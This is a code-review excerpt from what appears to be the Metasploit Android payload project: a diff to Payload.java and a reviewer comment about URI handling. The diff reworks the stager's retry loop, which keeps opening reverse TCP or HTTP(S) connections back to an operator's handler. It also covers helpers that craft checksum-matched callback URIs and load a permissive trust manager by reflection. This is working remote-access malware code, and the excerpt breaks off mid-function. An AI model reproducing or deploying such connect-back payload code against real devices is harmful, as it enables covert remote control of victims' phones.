androidpayload/app/src/com/metasploit/stage/Payload.java

```diff
@@ -19,166 +20,172 @@
+            retryWait = Integer.parseInt(RETRY_WAIT.substring(4).trim());
+        } catch (NumberFormatException e) {
+            return;
+        }
+
+        long retryEnd = System.currentTimeMillis() + TimeUnit.SECONDS.toMillis(retryTotal);
+        long retryDelay = TimeUnit.SECONDS.toMillis(retryWait);
+
+        while (retryEnd > System.currentTimeMillis()) {
+            startReverseConn();
+            try {
+                Thread.sleep(retryDelay);
+            } catch (InterruptedException e) {
+                return;
+            }
         }
-		int nTrials = Integer.parseInt(TRIALS.substring(4).trim());
-		while (!startReverseConn() && nTrials-- > 0) {
-			try {
-				Thread.sleep(60000);
-			} catch (InterruptedException e) {
-			}
-		}
-	}
-
-	private static boolean startReverseConn() {
-		try {
-			if (URL.substring(4).trim().length() == 0) {
+    }
+
+    private static void startReverseConn() {
+        try {
+            if (URL.substring(4).trim().length() == 0) {
                 reverseTCP();
             } else {
                 reverseHTTP();
             }
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
 
-			return true;
-		} catch (Exception e) {
-			return false;
-		}
-	}
-
-	private static String randomString(int len) {
-		StringBuilder sb = new StringBuilder(len);
-		for (int i = 0; i < len; i++) {
+    private static String randomString(int len) {
+        StringBuilder sb = new StringBuilder(len);
+        for (int i = 0; i < len; i++) {
             sb.append(AB.charAt(rnd.nextInt(AB.length())));
         }
-		return sb.toString();
-	}
+        return sb.toString();
+    }
 
-	private static int checksumText(String s) {
-		int tmp = 0;
-		for (int i = 0; i < s.length(); i++) {
+    private static int checksumText(String s) {
+        int tmp = 0;
+        for (int i = 0; i < s.length(); i++) {
             tmp += (int) s.charAt(i);
         }
-		return tmp % 0x100;
-	}
-
-	private static void reverseHTTP() throws Exception {
-		int checksum;
-		String URI;
-		HttpURLConnection urlConn;
-		String lurl = URL.substring(4).trim();
-
-		while (true) {
-			URI = randomString(4);
-			checksum = checksumText(URI);
-			if (checksum == URI_CHECKSUM_INITJ)
-				break;
-		}
-
-		String FullURI = "/" + URI;
-
-		URL url = new URL(lurl + FullURI + "_" + randomString(16));
-
-		if (lurl.startsWith("https")) {
-			urlConn = (HttpsURLConnection) url.openConnection();
-			Class.forName("com.metasploit.stage.PayloadTrustManager")
-					.getMethod("useFor", new Class[] { URLConnection.class })
-					.invoke(null, new Object[] { urlConn });
-		} else {
+        return tmp % 0x100;
+    }
+
+    private static void reverseHTTP() throws Exception {
+        int checksum;
+        String URI;
+        HttpURLConnection urlConn;
+        String lurl = URL.substring(4).trim();
+
+        while (true) {
+            URI = randomString(4);
```

Comment:
URIs should always be set by the metasploit-framework side (even a transport change call will pass down the new URL). The INITJ/CONNECT URIs are now much longer as well (30-128 bytes)